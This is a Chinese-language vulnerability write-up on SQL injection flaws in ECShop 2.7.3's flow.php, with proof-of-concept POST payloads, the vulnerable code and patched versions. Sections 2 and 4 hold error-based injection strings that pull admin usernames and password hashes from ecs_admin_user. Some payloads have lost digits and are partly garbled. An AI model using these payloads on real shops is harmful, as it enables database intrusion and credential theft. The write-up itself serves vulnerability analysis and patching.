catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码

Relevant Link:

http://sebug.net/vuldb/ssvid-60554

2. 漏洞触发条件

0x1: POC1

. 先注册账户,随便选个商品进购物车,然后填地址,电话等等

. 把任意商品加入购物车在填写配送地址那一页,有地区选择

. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1

//比如省选择安徽

. 其中POST数据如下

country=&province=&city=&district=&consignee=&email=%40qq.com&address=&zipcode=&tel=&mobile=&sign_building=&best_time=&Submit=%E9%%8D%E9%%%E8%%B3%E8%BF%%E4%B8%AA%E5%9C%B0%E5%9D%&step=consignee&act=checkout&address_id=province=

用firefox tamper data改成

localhost province=') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #

. 就会回显错误页面了

0x2: POC2

POST /flow.php?step=update_cart HTTP/1.1

Host: ${HOST}

Content-Type: application/x-www-form-urlencoded

Content-Length: ${AUTO}

goods_number%5B1%+and+%28select++from%28select+count%*%%2Cconcat%%28select+%28select+%28SELECT+concat%28user_name%2C0x7c%2Cmd5()%+FROM+ecs_admin_user+limit+%2C1%%+from+information_schema.tables+limit+%2C1%%2Cfloor%28rand%%*%%29x+from+information_schema.tables+group+by+x%29a%+and+%3D1+%%5D=&submit=exp

0x3: order_id注入

http://127.0.0.1/ECShop_V2.7.3/flow.php?step=repurchase

post

order_id= or updatexml(,concat(0x7e,(database())),) or #

file:///C:/Users/zhenghan.zh/Desktop/%E3%80%90%E5%B7%B2%E8%BD%AC%E6%AD%A3%E3%80%91Ecshop3.pdf

Relevant Link:

http://www.2cto.com/Article/201212/179861.html
http://www.yunsec.net/a/security/web/jbst/2013/0111/12225.html

3. 漏洞影响范围
4. 漏洞代码分析

0x1: step = consignee 注入点

/flow.php

elseif ($_REQUEST['step'] == 'consignee')

{

    ...

    //未对POST数据进行有效过滤

    else

    {

        /*

        * 保存收货人信息

        */

        $consignee = array(

        'address_id'    => empty($_POST['address_id']) ?   : intval($_POST['address_id']),

        'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),

        'country'       => empty($_POST['country'])    ? '' : $_POST['country'],

        'province'      => empty($_POST['province'])   ? '' : $_POST['province'],

        'city'          => empty($_POST['city'])       ? '' : $_POST['city'],

        'district'      => empty($_POST['district'])   ? '' : $_POST['district'],

        'email'         => empty($_POST['email'])      ? '' : $_POST['email'],

        'address'       => empty($_POST['address'])    ? '' : $_POST['address'],

        'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),

        'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),

        'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

        'sign_building' => empty($_POST['sign_building']) ? '' : $_POST['sign_building'],

        'best_time'     => empty($_POST['best_time'])  ? '' : $_POST['best_time'],

        );

        ..

0x2: step = update_cart 注入点

/flow.php

/*------------------------------------------------------ */

//-- 更新购物车

/*------------------------------------------------------ */

elseif ($_REQUEST['step'] == 'update_cart')

{

    if (isset($_POST['goods_number']) && is_array($_POST['goods_number']))

    {

        //带入sql查询

        flow_update_cart($_POST['goods_number']);

    }

    show_message($_LANG['update_cart_notice'], $_LANG['back_to_cart'], 'flow.php');

    exit;

}

flow_update_cart($_POST['goods_number']);

function flow_update_cart($arr)

{

    /* 处理 */

    foreach ($arr AS $key => $val)

    {

        //对数组的value进行了处理,但是没有对数组的key进行有效过滤

        $val = intval(make_semiangle($val));

        if ($val <= )

        {

            continue;

        }

        //查询:

        $sql = "SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code` FROM" .$GLOBALS['ecs']->table('cart').

               " WHERE rec_id='$key' AND session_id='" . SESS_ID . "'";

        $goods = $GLOBALS['db']->getRow($sql);

        die(var_dump($key));

        /*

        goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1] = value

        黑客注入这种payload,实现key sql注入

        */

        $sql = "SELECT g.goods_name, g.goods_number ".

                "FROM " .$GLOBALS['ecs']->table('goods'). " AS g, ".

                    $GLOBALS['ecs']->table('cart'). " AS c ".

                "WHERE g.goods_id = c.goods_id AND c.rec_id = '$key'";

        $row = $GLOBALS['db']->getRow($sql);

    ..

Relevant Link:

http://www.myhack58.com/Article/html/3/62/2010/26956.htm

http://0day5.com/archives/328

5. 防御方法

0x1: step = consignee 注入点

/flow.php

elseif ($_REQUEST['step'] == 'consignee')

{

    ...

    else

    {

        /*

        * 保存收货人信息

        */

        $consignee = array(

        /* 对用户输入的POST数据进行有效过滤 */

        'address_id'    => empty($_POST['address_id']) ?   :   intval($_POST['address_id']),

        'consignee'     => empty($_POST['consignee'])  ? '' :   compile_str(trim($_POST['consignee'])),

        'country'       => empty($_POST['country'])    ? '' :   intval($_POST['country']),

        'province'      => empty($_POST['province'])   ? '' :   intval($_POST['province']),

        'city'          => empty($_POST['city'])       ? '' :   intval($_POST['city']),

        'district'      => empty($_POST['district'])   ? '' :   intval($_POST['district']),

        /* */

        'email'         => empty($_POST['email'])      ? '' :   compile_str($_POST['email']),

        'address'       => empty($_POST['address'])    ? '' :   compile_str($_POST['address']),

        'zipcode'       => empty($_POST['zipcode'])    ? '' :   compile_str(make_semiangle(trim($_POST['zipcode']))),

        'tel'           => empty($_POST['tel'])        ? '' :   compile_str(make_semiangle(trim($_POST['tel']))),

        'mobile'        => empty($_POST['mobile'])     ? '' :   compile_str(make_semiangle(trim($_POST['mobile']))),

        'sign_building' => empty($_POST['sign_building']) ? '' :compile_str($_POST['sign_building']),

        'best_time'     => empty($_POST['best_time'])  ? '' :   compile_str($_POST['best_time']),

    );

    ..

需要注意的是,empty函数参数必须为variable,不能为其它函数的返回值,包括str_replace、trim等等,否则会报错

Can't use function return value in write context

0x2: step = update_cart 注入点

function flow_update_cart($arr)

{

    /* 处理 */

    foreach ($arr AS $key => $val)

    {

        $val = intval(make_semiangle($val));

    /**/

    if (!is_numeric($key))

        {

            continue;

        }

    /**/

        /*if ($val <= 0)*/

    if ($val <=  || !is_numeric($key))

        {

            continue;

        }

    ..

0x3: step = order_id 注入点

elseif ($_REQUEST['step'] == 'repurchase') {

    include_once('includes/cls_json.php');

    /**/

    $order_id = intval($_POST['order_id']);

    /**/

    $order_id = json_str_iconv($order_id);

    $user_id = $_SESSION['user_id'];

    $json  = new JSON;

    $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);

    if (!$order) {

        $result = array('error' => , 'message' => $_LANG['repurchase_fail']);

        die($json->encode($result));

    }

    $db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);

    $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);

    $result = array('error' => , 'message' => '');

    foreach ($order_goods as $goods) {

        $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);

        if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {

            $result = false;

            $result = array('error' => , 'message' => $_LANG['repurchase_fail']);

        }

    }

    die($json->encode($result));

}

else

{

    $flow_type = isset($_REQUEST['type']) ? $_REQUEST['type'] : CART_GENERAL_GOODS;

    $flow_type = strip_tags($flow_type);

    $flow_type = json_str_iconv($flow_type);

    /* 标记购物流程为普通商品 */

    $_SESSION['flow_type'] = $flow_type;

    /* 如果是一步购物,跳到结算中心 */

    if ($_CFG['one_step_buy'] == '')

    {

        ecs_header("Location: flow.php?step=checkout\n");

        exit;

    }

Relevant Link:

http://www.itokit.com/2012/1028/74804.html

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

ecshop /flow.php SQL Injection Vul的更多相关文章

  1. ecshop /search.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...

  2. ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出 ...

  3. ecshop /goods.php SQL Injection Vul

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: poc http://localhost ...

  4. ecshop /category.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://sebug.net/vuld ...

  5. ecshop /api/client/api.php、/api/client/includes/lib_api.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECShop存在一个盲注漏洞,问题存在于/api/client/api. ...

  6. ecshop /includes/modules/payment/alipay.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/ ...

  7. discuz /faq.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 . 通过获取管理员密码 . 对管理员密码进行破解.通过在cmd5.com ...

  8. dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 . php magic_quotes_gpc= ...

  9. dedecms /member/uploads_edit.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms 5.3版本下的member/uploads_edit.p ...

随机推荐

  1. Ruby中 使用Builder Xml Markup 操作XML

    =begin Ruby中 使用Xml Markup 轻松的对XML文档操作, 项目地址:http://builder.rubyforge.org/ 使用之前我们需要安装Builder xml mark ...

  2. single-write-database-connection

    http://ithare.com/ultimate-db-heresy-single-db-connection-part-i-performance-part-ii-scalability-to- ...

  3. 阿里云安装LNMP以及更改网站文件和MySQL数据目录

    LNMP安装了哪些软件?安装目录在哪LNMP相关软件安装目录Nginx 目录: /usr/local/nginx/MySQL 目录 : /usr/local/mysql/MySQL数据库所在目录:/u ...

  4. React Native中设计主题机制

    昨天和同事讨论组件隔离性的时候讨论到关于默认样式的问题:很多情况下我们希望能够把组件设计为通用的,然后在具体项目中给他们指定一些通用的样式,譬如:背景颜色.默认字体等等.这听起来在CSS下运作起来就很 ...

  5. linux中vi编辑器的使用

    vi编辑器是所有Unix及Linux系统下标准的编辑器,它的强大不逊色于任何最新的文本 编辑器,这里只是简单地介绍一下它的用法和一小部分指令.由于对Unix及Linux系统的任 何版本,vi编辑器是完 ...

  6. Trilateration三边测量定位算法

    转载自Jiaxing / 2014年2月22日 基本原理 Trilateration(三边测量)是一种常用的定位算法: 已知三点位置 (x1, y1), (x2, y2), (x3, y3) 已知未知 ...

  7. 文本域的宽度和高度应该用cols和rows来控制,还是 用width和height来控制

    文本域宽度如果用cols来控制,缩放网页的时候文本域的宽度不会自动变化 用width来表示就会跟着网页缩放而缩放 看到下面一段文字: 对于内容至上的网页,在禁用CSS的情况下,HTML内容要做到易于阅 ...

  8. Win7 64bit下32bit的 ODBC 数据源问题

    win764位有数据源,但是如果我们在win7 64bit中使用32位的数据源的时候,我们就需要对其进行配置,很有趣的是,64为的数据源我们可以在控制面板——系统与安全——管理工具——数据源,进入可对 ...

  9. webpack入坑之旅(三)webpack.config入门

    这是一系列文章,此系列所有的练习都存在了我的github仓库中vue-webpack,在本人有了新的理解与认识之后,会对文章有不定时的更正与更新.下面是目前完成的列表: webpack入坑之旅(一)不 ...

  10. mysql的主从复制是如何实现的

    前言 MySQL的主从复制是MySQL本身自带的一个功能,不需要额外的第三方软件就可以实现,其复制功能并不是copy文件来实现的,而是借助binlog日志文件里面的SQL命令实现的主从复制,可以理解为 ...